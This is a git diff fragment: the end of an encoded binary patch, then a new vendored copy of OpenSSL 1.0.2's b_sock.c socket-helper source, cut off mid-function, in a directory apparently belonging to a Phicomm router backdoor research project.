z^Ow1o>5fCl-E)$04u#c9QRfEM+^KL%py^s0$cQ;;Y6+q0l;F-;w#M(TmR3otr5{L<
z{rC#Uq~&4t_fkVx{Swvxs-cc1K5kq~Q;r#>sEHaBsXvo?L3|EosW-$Ip-Y|>=;@IE
zL}2((AU1PJGPAWLeCf2brySODw@G_uLJw<2F+oy?q{N2~<tAy57eJaWh9?v11Olg0
zZbqcU6{m6=Jl!<?4MxYwg<vo0;pD`?>FvRzS`zK2>H8R^5WGy&L9ra^+_IYSpO90l
zM7Ju7p75p5emwOSY3I}uS?vw0nQ--S;o08Am0N|MW~jEWt2cHmu}$<$i#ZPmMbE9M
zUlay3wGDPm^lPbl(Q_#1s388#(7#o$5<RIdaW_y2@=3o|HV{gl2nf#{R(t)KviwX~
zPPa}d0{bK{3N#C<x|MO&IYB<>zZi&rWK$fM&gIII7nK=Ow-<!S>J?cXlGRUS^}m8@
zy*OPvn*FE$(X=4!Iz4v^gey}+>VTOn`y*JVDX>RS*h@lP8O1YdIf}~~Ea%Q7&w@R>
zeU^Q)5>RMIa(|#vP!}bE#Y}1ldmSFC9m!4uvgFy=e}J|i#j34#Fni@IP0L+C0dy^$
zqdSaJtovZ%z-UjCmM=*^YAg8JyWnR#K1QFCguRofinazP8vua9p_R&Tjy{tYc8NP-
z$)BNcMvX8cA%DNWUrHR){1>}U2wlG!5AKk>7!&Z=8pGA|Md8U;0ZTusC9W24o@Dq*
zwDL`AyShO8h&fO^KSNn9r&o!M?6hU|0-OX`wO3Zp1krcUo3fMPHG?Ubp{4x&xta0&
zOl9`=iSfKw@yGLbDzkGF;`wq#i06IEtRA?HWN;l=SW5KU;O)K{)(#Ce>hq%9CxAL~
zS$H~gAHvg}`#|{BP~sC`;_CR#<2PKKkZ%3PK(4RH4pQRzyM^TKz?mvZT)AiS&FVXe
zeNJkxbE_q}i8NIQ7vg(Psy^UM-3@!dR?9WUH~7b^n%09?EuOCsk{`ef_2_|MK~R|^
z0E}!pEtJ&u!U_or^lE5>HX)SWcFVwE4eZNhfELdI%Z;=MroK~912-Rx0#iKSs+4c{
z#PhOJ6VI=Ug;A4kyuCo1`))k{XzX4FapiKQQhY&cHyRNFq;{wqaU?+UiHs6W1GAo+
zpdZx0N#pq~!cTq<;W3_Hu^mn)By`OM1>*U|Lf0%dm?0$7uujwUVx!bO0~t5MJl*k1
zAb!;=Jk`z?SttnzzZ#|mH-UWy>tHc8C2_e(DNkH>D5Y9oY;huw=P{7zh4WbGR;S>3
zEQIr@h4ZL$%EH?u7rX&YisbIN0ZEi={E+mZ)H4AMv7%w{RqPY}-k|zBIFa84EQ&El
z>0^!piZMq)#VB)>pztOt_O&!JQ|xO=f+-^PI6;qizD=1N&&PD_y4?T;g-{=}^NQu5
zE#51*%y_S|=_?SJ5(m74MR0PdI>(OuFMxit3(e?eW~_6Jw&RfCCg7dIihl6TD=or3
zeUAyk3iK@^y~VT5TbOO6;eC*8Lh2DI@dwN{Z+Q_+Xyf-l3?LxpX6UeId1Z(Svoeyf
z^pqSu0Rh%IB&>W#dnfk=;>TNr()VF-_lY54)fs~WwmyU4X_`2r!NPuE*@xtPi1q`r
z4@i1x;(d))AK!Kp)iSi~_+E5#8PZbZZ9F{sysC(9dP(EK2(l7QW-xgqu1<mc<P(0{
zOSMCRu2U={xu>#><eq}8kdfT}VX2$R(Q_W;q(>lF_R;6VmoB3$b>GhVN(CfH)kE7q
zg4Cg3Ghtcp%vKCs!Ls+XqoL$k2x=bTnSH>o5dVpwIxrIf+FN#1pnrr#5v*xbiY}dl
z-mSDjBHM-W0XP*=&x&}BLh5NAFCkD?LE6d<>tV7A6LBMOb>Z>q3~H~QhP0z2JORwr
zRoOQ<TLAM&Rqn8wW!{s_JOK!#g%Ji>PeQ;&gX$^~`0IgR0e;Lt6f$O25R!fXW3{aH
z<$j&K*bN#GA$+jxAZq{Z>uI08r=U9;8Z$y91ZmK2(tv4&Nr9r?0U0!?LJi#6p)d7(
z4En+p>kiNZ>9oFNCibS3xZn(pzY-fKry(`vmNJ=AcLiw1FUIR2K#oEUf|l!C1RGab
zHx6sZSZR|@0xet#mbGK==6(jHi%67jjnL=es_Dkgt^`_57RB5dwlyBfQxI6W0$yDK
z?Vzk8Pj)6y=gyAY%M!SiYMo=S9$69#ozB7U!3YB3*M>d_4a`!5H~$I5G=<lDt027%
zif+gJ?Fd0F47VaSju(6W6Y6oQ^~SfkH4^)x?C2iQ8cy^*DSp8wsV9{Z>C#!K1%m3i
z+*0*DwslB-Un(0+UVP%dQ1!7VbW<Aj%LVknPtbitw5LZuLEjg6f^c|fRu4LnnCsCG
zoR?VlgD7EF7%nuk9^CH{zcfqw=yUxNz(qmnC{xn*<+?#3^c^>#?)21BI12SEcoC`k
zl(6e_80b>*Ug>gmeWAvB1_b8%Z)9~WCz!quVy3__46zpi`QWy^rX?=hQd1~+WMk~E
zuRlCEj~3OLYsQpP47u)4pr=4T_l8n|2y9!p&Dpny^peD%!367r+ZRqbz-I9N{(dC%
z!R4XV1H#|$Q-#iAJSx3J3qc7uVx{b6kb{<Hi>1h;j-ybYW3hNmNxI_z)|;m9pU;Kc
z^X#LC2V|&8)suS&)E7{j1|Yvt2-slPR=DZ<XWpoav<fId9ko^TVp&>BkOKx-Z<8!O
zXj*|cNki#~N|#ay0N&a<8EZ*Q3u5*^nd2#9;Ng|{@*emsRBnM!0i7G|AgKq~B<BK{
z!Zk&?28geUT8#0ksD4mAk8isl-xJ>GG-?D9%ZC+q6;{{~#UM_>7sNcFEGX6rWwQ8)
zP*yLt3uP~eaUd7UUedpH%KlY+k<H%_Ut|5R#SHW&dw{#+*>s8L0jKJR@NJ8Jh(`w|
z42oW`i~~)h$1xay(}N*E_lfLN)A(}OaR3$7l}>zI6;}Jg5CYg20$9=uqS1~}&Qyy2
z;ZX{d`ZKjsEn0R~_Q!B<9!~UWD<MEmCo%AUP+<>*8I9hD!A4lzOH+zi3fotX+CFih
zYP7-r?`?GfY~|sW`Lk@bCeq%qev?uWCB7{LZ0z&To>MvZ-g#BkQq96(XpsqMS`%H{
z+(PCrZII;!WNlkhdq-&*9>)KV_UZk)o?<}n&+~af`*>lrc;UkDcuO1B#5O50Z*|3-
z3SYT@UW`rsPt5jJ_$teESm(g+40KqmE*CFtAdtQ?h~d`;wyAnYY=83*v2AhNZkssH
zxf}995b)`IZ9n!kF85E0LN3oPd)VboJ3_9~r;CFw-;*~5T~&#3Ay=U2Syz?h@=31J
z8ke`m<pG8omy-hPS}y0WVRMt5&}cal$_cu5+w7sDu_O_)6WCwlvYy3~k?90m?XoW#
zL)K!~fXzO`KEZX`R^vKvqpqw?a(!wGl@z@UkOWW-hw71Xb+MI_me^gku~i`f*nU11
z!qBq#Smbg)UG#v<^Q2vJc@vIhuJi7q23OV%Te|fgfI62q=<-O+GKApeh;tdgL>Ui&
zPDQV}AjT0d{9fQ|+h9znE70bmHLltRTr}tkbOIIfXE+VB3*&!@@gvJv4aptkGi|Ij
z`<VX}qOTa<GMdW{lE!Lw=53=_N?=-KlFxh!uv<88%$bh>c00$*`PS^b0mEh|_>FvR
zvtz0nquB|5E?wK~1hu-h*~!FfK|t(;eQ%9g6WNS?yN$y2;8RS5Q79o;ALDJbN}9uQ
zbZc{~Vv}NWhZ%%1`=|#wc(={1hE1-0-^C2S);==Ftt$_4+$z73;l*S&>qj1|IbJ;i
z6-IVqeJetuuxgc!3|p^*KXo1a+3Vo{0{CR`xBcAES(sz{cleF9@4@Tf$F75)y$+rO
z9QXa13kJ~Gy@q}meuzK99fI9yz#MQP5&wYWuK~u|Nb+OZEYcQJqU%V@Mg=k=iL7mF
z?;sWOLLWZn;A1vE{P>uQk4k)0<Ktd@_!*&}t<Ph?Y!X>4FRPK{$g)L?>O%FAdZ|VZ
zMaaU3R@T-pi)?IaZEcGhvyNtc8i{l&P0<aJ=(-J&mZtTsq$a#9@)*m~Ee36StaDvt
z{ic?-2wUCUv0iC5)>=B63*+{-c1FgixCkb$bCYRSm~gWgo`k6cO$L8rvZnhb#x_F!
z%7mkTU_%^Zia|e*$4!)j{$SwvErbp6N$@l9hzXx;!dpzZS<Yi79RKPt<ftYbbFYC<
z<8co4{FVuSo#Utv-fDyXT^@1_+{oj9I}V7TA&&nF8T7v};omgjZ<=t7#RmPL3CBER
z;0t)5K>6nPdi*+gl!sWPzttq?=lot;-}e~Dk$#$q{xcJ9K6fv_XDH_m6a5cN__s~?
z1`~d#3EyJE&Gc~-E}H0{GvVg*x}V=;)W>V0uQ%al`jgkeH}D{Za_%z8iJNe<93Wv0
z?S{YqHu)1S82C~Y2+fH12L1}ijm&4@M>x*6Ey$V2{m<|_gZ>{mjy{9Uz#r!++o&lG
zJjBn{%cw`_!yFea_!5qnTJQ%sKFfkPaNK9XS8}}4g0JRyl?89&_<RfA%<+H)U(fNN
z1;3Nu2Wr7@=l0R_@rWHtIDM^!elx$H^%i^zr#IrEVdouOpH&w6*?iweEV#<)*IMv2
z$Jbf#zvFnT1%HO)?H0U<<BA18$MxA_!H;ssH1ekLUN3VwaSQ#c9PhH=ySaUKTJYC7
z{nHlwORmpu3*N)&|G|Q<;q=d0a2r1_uLb8*VzuXfzVL>H-l&HIraXeSFzTEx3vSdQ
zFIsS;4mn`KjXH!>bZ*_KG_8SN>CpRi#;BvYwW&gB-lC9-wM|MBsaVt5Nh&(paDwFi
z3aB#}k&YGCqMb^WdE$rKB-*xdV>6UA6`R_W<_h>kEoUVLpZ{=EtfIZ6t-ZNJ*~(=$
zuZy&FG;M4)Ecci7USLNP@M9|o3-Hm??gGRH+*}3lHW)eJ7bqb5;JiogJv<I$m`7fx
z4zq7J9Nq;##5oy4to_!quYp_lp9Kpj^Uvk?124+7*7L^x60Dh<vA@xWU=hdYgXZSO
z;tARddRKU&t;{U|ld<e~84U~V6_fq&jI8!s0vPU(HJQ1+#`ovPP*^hfjs9U+8H;~_
z^IMO>m>c~%&hIPipbyS-{+Slsu$$38%K0s1q{R9{oWS5S=y$*XL(4Vx=louSkoU%W
z8}RcmK$%v4ALl=9+0e?5@o%j2dl8EhXs_rUtJN`N8vMq&jI}qiIH&528Gim~@9Bu^
naN+)7O>FgjB<aIq7TP3>{+21L@yFt)UdB%TS?>x@EC2rjw(p>=

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_sock.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_sock.c
new file mode 100644
index 0000000..5bad0a2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_sock.c
@@ -0,0 +1,962 @@
+/* crypto/bio/b_sock.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#define USE_SOCKETS
+#include "cryptlib.h"
+#include <openssl/bio.h>
+#if defined(OPENSSL_SYS_NETWARE) && defined(NETWARE_BSDSOCK)
+# include <netdb.h>
+# if defined(NETWARE_CLIB)
+#  include <sys/ioctl.h>
+NETDB_DEFINE_CONTEXT
+# endif
+#endif
+#ifndef OPENSSL_NO_SOCK
+# include <openssl/dso.h>
+# define SOCKET_PROTOCOL IPPROTO_TCP
+# ifdef SO_MAXCONN
+#  define MAX_LISTEN  SO_MAXCONN
+# elif defined(SOMAXCONN)
+#  define MAX_LISTEN  SOMAXCONN
+# else
+#  define MAX_LISTEN  32
+# endif
+# if defined(OPENSSL_SYS_WINDOWS) || (defined(OPENSSL_SYS_NETWARE) && !defined(NETWARE_BSDSOCK))
+static int wsa_init_done = 0;
+# endif
+
+/*
+ * WSAAPI specifier is required to make indirect calls to run-time
+ * linked WinSock 2 functions used in this module, to be specific
+ * [get|free]addrinfo and getnameinfo. This is because WinSock uses
+ * uses non-C calling convention, __stdcall vs. __cdecl, on x86
+ * Windows. On non-WinSock platforms WSAAPI needs to be void.
+ */
+# ifndef WSAAPI
+#  define WSAAPI
+# endif
+
+# if 0
+static unsigned long BIO_ghbn_hits = 0L;
+static unsigned long BIO_ghbn_miss = 0L;
+
+#  define GHBN_NUM        4
+static struct ghbn_cache_st {
+    char name[129];
+    struct hostent *ent;
+    unsigned long order;
+} ghbn_cache[GHBN_NUM];
+# endif
+
+static int get_ip(const char *str, unsigned char *ip);
+# if 0
+static void ghbn_free(struct hostent *a);
+static struct hostent *ghbn_dup(struct hostent *a);
+# endif
+int BIO_get_host_ip(const char *str, unsigned char *ip)
+{
+    int i;
+    int err = 1;
+    int locked = 0;
+    struct hostent *he;
+
+    i = get_ip(str, ip);
+    if (i < 0) {
+        BIOerr(BIO_F_BIO_GET_HOST_IP, BIO_R_INVALID_IP_ADDRESS);
+        goto err;
+    }
+
+    /*
+     * At this point, we have something that is most probably correct in some
+     * way, so let's init the socket.
+     */
+    if (BIO_sock_init() != 1)
+        return 0;               /* don't generate another error code here */
+
+    /*
+     * If the string actually contained an IP address, we need not do
+     * anything more
+     */
+    if (i > 0)
+        return (1);
+
+    /* do a gethostbyname */
+    CRYPTO_w_lock(CRYPTO_LOCK_GETHOSTBYNAME);
+    locked = 1;
+    he = BIO_gethostbyname(str);
+    if (he == NULL) {
+        BIOerr(BIO_F_BIO_GET_HOST_IP, BIO_R_BAD_HOSTNAME_LOOKUP);
+        goto err;
+    }
+
+    /* cast to short because of win16 winsock definition */
+    if ((short)he->h_addrtype != AF_INET) {
+        BIOerr(BIO_F_BIO_GET_HOST_IP,
+               BIO_R_GETHOSTBYNAME_ADDR_IS_NOT_AF_INET);
+        goto err;
+    }
+    for (i = 0; i < 4; i++)
+        ip[i] = he->h_addr_list[0][i];
+    err = 0;
+
+ err:
+    if (locked)
+        CRYPTO_w_unlock(CRYPTO_LOCK_GETHOSTBYNAME);
+    if (err) {
+        ERR_add_error_data(2, "host=", str);
+        return 0;
+    } else
+        return 1;
+}
+
+int BIO_get_port(const char *str, unsigned short *port_ptr)
+{
+    int i;
+    struct servent *s;
+
+    if (str == NULL) {
+        BIOerr(BIO_F_BIO_GET_PORT, BIO_R_NO_PORT_DEFINED);
+        return (0);
+    }
+    i = atoi(str);
+    if (i != 0)
+        *port_ptr = (unsigned short)i;
+    else {
+        CRYPTO_w_lock(CRYPTO_LOCK_GETSERVBYNAME);
+        /*
+         * Note: under VMS with SOCKETSHR, it seems like the first parameter
+         * is 'char *', instead of 'const char *'
+         */
+# ifndef CONST_STRICT
+        s = getservbyname((char *)str, "tcp");
+# else
+        s = getservbyname(str, "tcp");
+# endif
+        if (s != NULL)
+            *port_ptr = ntohs((unsigned short)s->s_port);
+        CRYPTO_w_unlock(CRYPTO_LOCK_GETSERVBYNAME);
+        if (s == NULL) {
+            if (strcmp(str, "http") == 0)
+                *port_ptr = 80;
+            else if (strcmp(str, "telnet") == 0)
+                *port_ptr = 23;
+            else if (strcmp(str, "socks") == 0)
+                *port_ptr = 1080;
+            else if (strcmp(str, "https") == 0)
+                *port_ptr = 443;
+            else if (strcmp(str, "ssl") == 0)
+                *port_ptr = 443;
+            else if (strcmp(str, "ftp") == 0)
+                *port_ptr = 21;
+            else if (strcmp(str, "gopher") == 0)
+                *port_ptr = 70;
+# if 0
+            else if (strcmp(str, "wais") == 0)
+                *port_ptr = 21;
+# endif
+            else {
+                SYSerr(SYS_F_GETSERVBYNAME, get_last_socket_error());
+                ERR_add_error_data(3, "service='", str, "'");
+                return (0);
+            }
+        }
+    }
+    return (1);
+}
+
+int BIO_sock_error(int sock)
+{
+    int j, i;
+    union {
+        size_t s;
+        int i;
+    } size;
+
+# if defined(OPENSSL_SYS_BEOS_R5)
+    return 0;
+# endif
+
+    /* heuristic way to adapt for platforms that expect 64-bit optlen */
+    size.s = 0, size.i = sizeof(j);
+    /*
+     * Note: under Windows the third parameter is of type (char *) whereas
+     * under other systems it is (void *) if you don't have a cast it will
+     * choke the compiler: if you do have a cast then you can either go for
+     * (char *) or (void *).
+     */
+    i = getsockopt(sock, SOL_SOCKET, SO_ERROR, (void *)&j, (void *)&size);
+    if (i < 0)
+        return (1);
+    else
+        return (j);
+}
+
+# if 0
+long BIO_ghbn_ctrl(int cmd, int iarg, char *parg)
+{
+    int i;
+    char **p;
+
+    switch (cmd) {
+    case BIO_GHBN_CTRL_HITS:
+        return (BIO_ghbn_hits);
+        /* break; */
+    case BIO_GHBN_CTRL_MISSES:
+        return (BIO_ghbn_miss);
+        /* break; */
+    case BIO_GHBN_CTRL_CACHE_SIZE:
+        return (GHBN_NUM);
+        /* break; */
+    case BIO_GHBN_CTRL_GET_ENTRY:
+        if ((iarg >= 0) && (iarg < GHBN_NUM) && (ghbn_cache[iarg].order > 0)) {
+            p = (char **)parg;
+            if (p == NULL)
+                return (0);
+            *p = ghbn_cache[iarg].name;
+            ghbn_cache[iarg].name[128] = '\0';
+            return (1);
+        }
+        return (0);
+        /* break; */
+    case BIO_GHBN_CTRL_FLUSH:
+        for (i = 0; i < GHBN_NUM; i++)
+            ghbn_cache[i].order = 0;
+        break;
+    default:
+        return (0);
+    }
+    return (1);
+}
+# endif
+
+# if 0
+static struct hostent *ghbn_dup(struct hostent *a)
+{
+    struct hostent *ret;
+    int i, j;
+
+    MemCheck_off();
+    ret = (struct hostent *)OPENSSL_malloc(sizeof(struct hostent));
+    if (ret == NULL)
+        return (NULL);
+    memset(ret, 0, sizeof(struct hostent));
+
+    for (i = 0; a->h_aliases[i] != NULL; i++) ;
+    i++;
+    ret->h_aliases = (char **)OPENSSL_malloc(i * sizeof(char *));
+    if (ret->h_aliases == NULL)
+        goto err;
+    memset(ret->h_aliases, 0, i * sizeof(char *));
+
+    for (i = 0; a->h_addr_list[i] != NULL; i++) ;
+    i++;
+    ret->h_addr_list = (char **)OPENSSL_malloc(i * sizeof(char *));
+    if (ret->h_addr_list == NULL)
+        goto err;
+    memset(ret->h_addr_list, 0, i * sizeof(char *));
+
+    j = strlen(a->h_name) + 1;
+    if ((ret->h_name = OPENSSL_malloc(j)) == NULL)
+        goto err;
+    memcpy((char *)ret->h_name, a->h_name, j);
+    for (i = 0; a->h_aliases[i] != NULL; i++) {
+        j = strlen(a->h_aliases[i]) + 1;
+        if ((ret->h_aliases[i] = OPENSSL_malloc(j)) == NULL)
+            goto err;
+        memcpy(ret->h_aliases[i], a->h_aliases[i], j);
+    }
+    ret->h_length = a->h_length;
+    ret->h_addrtype = a->h_addrtype;
+    for (i = 0; a->h_addr_list[i] != NULL; i++) {
+        if ((ret->h_addr_list[i] = OPENSSL_malloc(a->h_length)) == NULL)
+            goto err;
+        memcpy(ret->h_addr_list[i], a->h_addr_list[i], a->h_length);
+    }
+    if (0) {
+ err:
+        if (ret != NULL)
+            ghbn_free(ret);
+        ret = NULL;
+    }
+    MemCheck_on();
+    return (ret);
+}
+
+static void ghbn_free(struct hostent *a)
+{
+    int i;
+
+    if (a == NULL)
+        return;
+
+    if (a->h_aliases != NULL) {
+        for (i = 0; a->h_aliases[i] != NULL; i++)
+            OPENSSL_free(a->h_aliases[i]);
+        OPENSSL_free(a->h_aliases);
+    }
+    if (a->h_addr_list != NULL) {
+        for (i = 0; a->h_addr_list[i] != NULL; i++)
+            OPENSSL_free(a->h_addr_list[i]);
+        OPENSSL_free(a->h_addr_list);
+    }
+    if (a->h_name != NULL)
+        OPENSSL_free(a->h_name);
+    OPENSSL_free(a);
+}
+
+# endif
+
+struct hostent *BIO_gethostbyname(const char *name)
+{
+# if 1
+    /*
+     * Caching gethostbyname() results forever is wrong, so we have to let
+     * the true gethostbyname() worry about this
+     */
+#  if (defined(NETWARE_BSDSOCK) && !defined(__NOVELL_LIBC__))
+    return gethostbyname((char *)name);
+#  else
+    return gethostbyname(name);
+#  endif
+# else
+    struct hostent *ret;
+    int i, lowi = 0, j;
+    unsigned long low = (unsigned long)-1;
+
+#  if 0
+    /*
+     * It doesn't make sense to use locking here: The function interface is
+     * not thread-safe, because threads can never be sure when some other
+     * thread destroys the data they were given a pointer to.
+     */
+    CRYPTO_w_lock(CRYPTO_LOCK_GETHOSTBYNAME);
+#  endif
+    j = strlen(name);
+    if (j < 128) {
+        for (i = 0; i < GHBN_NUM; i++) {
+            if (low > ghbn_cache[i].order) {
+                low = ghbn_cache[i].order;
+                lowi = i;
+            }
+            if (ghbn_cache[i].order > 0) {
+                if (strncmp(name, ghbn_cache[i].name, 128) == 0)
+                    break;
+            }
+        }
+    } else
+        i = GHBN_NUM;
+
+    if (i == GHBN_NUM) {        /* no hit */
+        BIO_ghbn_miss++;
+        /*
+         * Note: under VMS with SOCKETSHR, it seems like the first parameter
+         * is 'char *', instead of 'const char *'
+         */
+#  ifndef CONST_STRICT
+        ret = gethostbyname((char *)name);
+#  else
+        ret = gethostbyname(name);
+#  endif
+
+        if (ret == NULL)
+            goto end;
+        if (j > 128) {          /* too big to cache */
+#  if 0
+            /*
+             * If we were trying to make this function thread-safe (which is
+             * bound to fail), we'd have to give up in this case (or allocate
+             * more memory).
+             */
+            ret = NULL;
+#  endif
+            goto end;
+        }
+
+        /* else add to cache */
+        if (ghbn_cache[lowi].ent != NULL)
+            ghbn_free(ghbn_cache[lowi].ent); /* XXX not thread-safe */
+        ghbn_cache[lowi].name[0] = '\0';
+
+        if ((ret = ghbn_cache[lowi].ent = ghbn_dup(ret)) == NULL) {
+            BIOerr(BIO_F_BIO_GETHOSTBYNAME, ERR_R_MALLOC_FAILURE);
+            goto end;
+        }
+        strncpy(ghbn_cache[lowi].name, name, 128);
+        ghbn_cache[lowi].order = BIO_ghbn_miss + BIO_ghbn_hits;
+    } else {
+        BIO_ghbn_hits++;
+        ret = ghbn_cache[i].ent;
+        ghbn_cache[i].order = BIO_ghbn_miss + BIO_ghbn_hits;
+    }
+ end:
+#  if 0
+    CRYPTO_w_unlock(CRYPTO_LOCK_GETHOSTBYNAME);
+#  endif
+    return (ret);
+# endif
+}
+
+int BIO_sock_init(void)
+{
+# ifdef OPENSSL_SYS_WINDOWS
+    static struct WSAData wsa_state;
+
+    if (!wsa_init_done) {
+        int err;
+
+        wsa_init_done = 1;
+        memset(&wsa_state, 0, sizeof(wsa_state));
+        /*
+         * Not making wsa_state available to the rest of the code is formally
+         * wrong. But the structures we use are [beleived to be] invariable
+         * among Winsock DLLs, while API availability is [expected to be]
+         * probed at run-time with DSO_global_lookup.
+         */
+        if (WSAStartup(0x0202, &wsa_state) != 0) {
+            err = WSAGetLastError();
+            SYSerr(SYS_F_WSASTARTUP, err);
+            BIOerr(BIO_F_BIO_SOCK_INIT, BIO_R_WSASTARTUP);
+            return (-1);
+        }
+    }
+# endif                         /* OPENSSL_SYS_WINDOWS */
+# ifdef WATT32
+    extern int _watt_do_exit;
+    _watt_do_exit = 0;          /* don't make sock_init() call exit() */
+    if (sock_init())
+        return (-1);
+# endif
+
+# if defined(OPENSSL_SYS_NETWARE) && !defined(NETWARE_BSDSOCK)
+    WORD wVerReq;
+    WSADATA wsaData;
+    int err;
+
+    if (!wsa_init_done) {
+        wsa_init_done = 1;
+        wVerReq = MAKEWORD(2, 0);
+        err = WSAStartup(wVerReq, &wsaData);
+        if (err != 0) {
+            SYSerr(SYS_F_WSASTARTUP, err);
+            BIOerr(BIO_F_BIO_SOCK_INIT, BIO_R_WSASTARTUP);
+            return (-1);
+        }
+    }
+# endif
+
+    return (1);
+}
+
+void BIO_sock_cleanup(void)
+{
+# ifdef OPENSSL_SYS_WINDOWS
+    if (wsa_init_done) {
+        wsa_init_done = 0;
+#  if 0                         /* this call is claimed to be non-present in
+                                 * Winsock2 */
+        WSACancelBlockingCall();
+#  endif
+        WSACleanup();
+    }
+# elif defined(OPENSSL_SYS_NETWARE) && !defined(NETWARE_BSDSOCK)
+    if (wsa_init_done) {
+        wsa_init_done = 0;
+        WSACleanup();
+    }
+# endif
+}
+
+# if !defined(OPENSSL_SYS_VMS) || __VMS_VER >= 70000000
+
+int BIO_socket_ioctl(int fd, long type, void *arg)
+{
+    int i;
+
+#  ifdef __DJGPP__
+    i = ioctlsocket(fd, type, (char *)arg);
+#  else
+#   if defined(OPENSSL_SYS_VMS)
+    /*-
+     * 2011-02-18 SMS.
+     * VMS ioctl() can't tolerate a 64-bit "void *arg", but we
+     * observe that all the consumers pass in an "unsigned long *",
+     * so we arrange a local copy with a short pointer, and use
+     * that, instead.
+     */
+#    if __INITIAL_POINTER_SIZE == 64
+#     define ARG arg_32p
+#     pragma pointer_size save
+#     pragma pointer_size 32
+    unsigned long arg_32;
+    unsigned long *arg_32p;
+#     pragma pointer_size restore
+    arg_32p = &arg_32;
+    arg_32 = *((unsigned long *)arg);
+#    else                       /* __INITIAL_POINTER_SIZE == 64 */
+#     define ARG arg
+#    endif                      /* __INITIAL_POINTER_SIZE == 64 [else] */
+#   else                        /* defined(OPENSSL_SYS_VMS) */
+#    define ARG arg
+#   endif                       /* defined(OPENSSL_SYS_VMS) [else] */
+
+    i = ioctlsocket(fd, type, ARG);
+#  endif                        /* __DJGPP__ */
+    if (i < 0)
+        SYSerr(SYS_F_IOCTLSOCKET, get_last_socket_error());
+    return (i);
+}
+# endif                         /* __VMS_VER */
+
+/*
+ * The reason I have implemented this instead of using sscanf is because
+ * Visual C 1.52c gives an unresolved external when linking a DLL :-(
+ */
+static int get_ip(const char *str, unsigned char ip[4])
+{
+    unsigned int tmp[4];
+    int num = 0, c, ok = 0;
+
+    tmp[0] = tmp[1] = tmp[2] = tmp[3] = 0;
+
+    for (;;) {
+        c = *(str++);
+        if ((c >= '0') && (c <= '9')) {
+            ok = 1;
+            tmp[num] = tmp[num] * 10 + c - '0';
+            if (tmp[num] > 255)
+                return (0);
+        } else if (c == '.') {
+            if (!ok)
+                return (-1);
+            if (num == 3)
+                return (0);
+            num++;
+            ok = 0;
+        } else if (c == '\0' && (num == 3) && ok)
+            break;
+        else
+            return (0);
+    }
+    ip[0] = tmp[0];
+    ip[1] = tmp[1];
+    ip[2] = tmp[2];
+    ip[3] = tmp[3];
+    return (1);
+}
+
+int BIO_get_accept_socket(char *host, int bind_mode)
+{
+    int ret = 0;
+    union {
+        struct sockaddr sa;
+        struct sockaddr_in sa_in;
+# if OPENSSL_USE_IPV6
+        struct sockaddr_in6 sa_in6;
+# endif
+    } server, client;
+    int s = INVALID_SOCKET, cs, addrlen;
+    unsigned char ip[4];
+    unsigned short port;
+    char *str = NULL, *e;
+    char *h, *p;
+    unsigned long l;
+    int err_num;
+
+    if (BIO_sock_init() != 1)
+        return (INVALID_SOCKET);
+
+    if ((str = BUF_strdup(host)) == NULL)
+        return (INVALID_SOCKET);
+
+    h = p = NULL;
+    h = str;
+    for (e = str; *e; e++) {
+        if (*e == ':') {
+            p = e;
+        } else if (*e == '/') {
+            *e = '\0';
+            break;
+        }
+    }
+    if (p)
+        *p++ = '\0';            /* points at last ':', '::port' is special
+                                 * [see below] */
+    else
+        p = h, h = NULL;
+
+# ifdef EAI_FAMILY
+    do {
+        static union {
+            void *p;
+            int (WSAAPI *f) (const char *, const char *,
